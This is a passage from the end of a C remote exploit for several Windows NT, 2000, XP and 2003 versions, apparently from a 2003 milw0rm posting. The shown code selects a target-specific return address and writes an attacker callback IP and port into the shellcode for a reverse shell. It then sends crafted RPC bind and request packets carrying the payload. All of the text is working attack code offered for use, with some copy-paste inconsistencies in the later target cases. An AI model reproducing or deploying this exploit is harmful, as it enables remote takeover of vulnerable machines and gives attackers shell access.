sp4\n"); printf("[<$>] 47 Winxp big5 sp0\n"); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) { // get the host info perror("gethostbyname"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("Sorry, cannot connect to %s. Try again...\n", argv[1]); exit(1); } if(atoi(argv[4])==0) memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng)); else if (atoi(argv[4])==1) memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn)); else if (atoi(argv[4])==2) memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn)); else if (atoi(argv[4])==3) memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn)); else if (atoi(argv[4])==4) memcpy(sc+36,win2knosppl,sizeof(win2knosppl)); else if (atoi(argv[4])==5) memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl)); else if (atoi(argv[4])==6) memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp)); else if (atoi(argv[4])==7) memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1)); else if (atoi(argv[4])==8) memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2)); else if (atoi(argv[4])==9) memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng)); else if (atoi(argv[4])==10) memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1)); else if (atoi(argv[4])==11) memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2)); else if (atoi(argv[4])==12) memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1)); else if (atoi(argv[4])==13) memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2)); else if (atoi(argv[4])==14) memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng)); else if (atoi(argv[4])==15) memcpy(sc+36,win2knospchi,sizeof(win2knospchi)); else if (atoi(argv[4])==16) memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi)); else if (atoi(argv[4])==17) memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi)); else if (atoi(argv[4])==18) memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi)); else if (atoi(argv[4])==19) memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi)); else if (atoi(argv[4])==20) memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger)); else if (atoi(argv[4])==21) memcpy(sc+36,win2knospjap,sizeof(win2knospjap)); else if (atoi(argv[4])==22) memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap)); else if (atoi(argv[4])==23) memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap)); else if (atoi(argv[4])==24) memcpy(sc+36,win2knospkr,sizeof(win2knospkr)); else if (atoi(argv[4])==25) memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr)); else if (atoi(argv[4])==26) memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr)); else if (atoi(argv[4])==27) memcpy(sc+36,win2knospmx,sizeof(win2knospmx)); else if (atoi(argv[4])==28) memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx)); else if (atoi(argv[4])==29) memcpy(sc+36,win2knospken,sizeof(win2knospken)); else if (atoi(argv[4])==30) memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken)); else if (atoi(argv[4])==31) memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken)); else if (atoi(argv[4])==32) memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng)); else if (atoi(argv[4])==33) memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1)); else if (atoi(argv[4])==34) memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2)); else if (atoi(argv[4])==35) memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng)); else if (atoi(argv[4])==36) memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng)); else if (atoi(argv[4])==37) memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger)); else if (atoi(argv[4])==38) memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1)); else if (atoi(argv[4])==39) memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2)); else if (atoi(argv[4])==40) memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger)); else if (atoi(argv[4])==41) memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr)); else if (atoi(argv[4])==42) memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr)); else if (atoi(argv[4])==43) memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr)); else if (atoi(argv[4])==44) memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr)); else if (atoi(argv[4])==45) memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big)); else if (atoi(argv[4])==46) memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big)); else if (atoi(argv[4])==47) memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big)); port1 = htons(atoi(argv[3])); port1 ^= 0x9393; cb=inet_addr(argv[2]); cb ^= 0x93939393; *(unsigned short *)&sc[330+0x30] = port1; *(unsigned int *)&sc[335+0x30] = cb; len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc; if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){ printf("Send failed pussy.\n"); exit(1); } len=recv(sockfd,buf1,1000,0); if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) { printf("Send failed pussy\n"); exit (1); } len=recv(sockfd,buf1,1024,0); return 0; } // milw0rm.com [2003-07-30]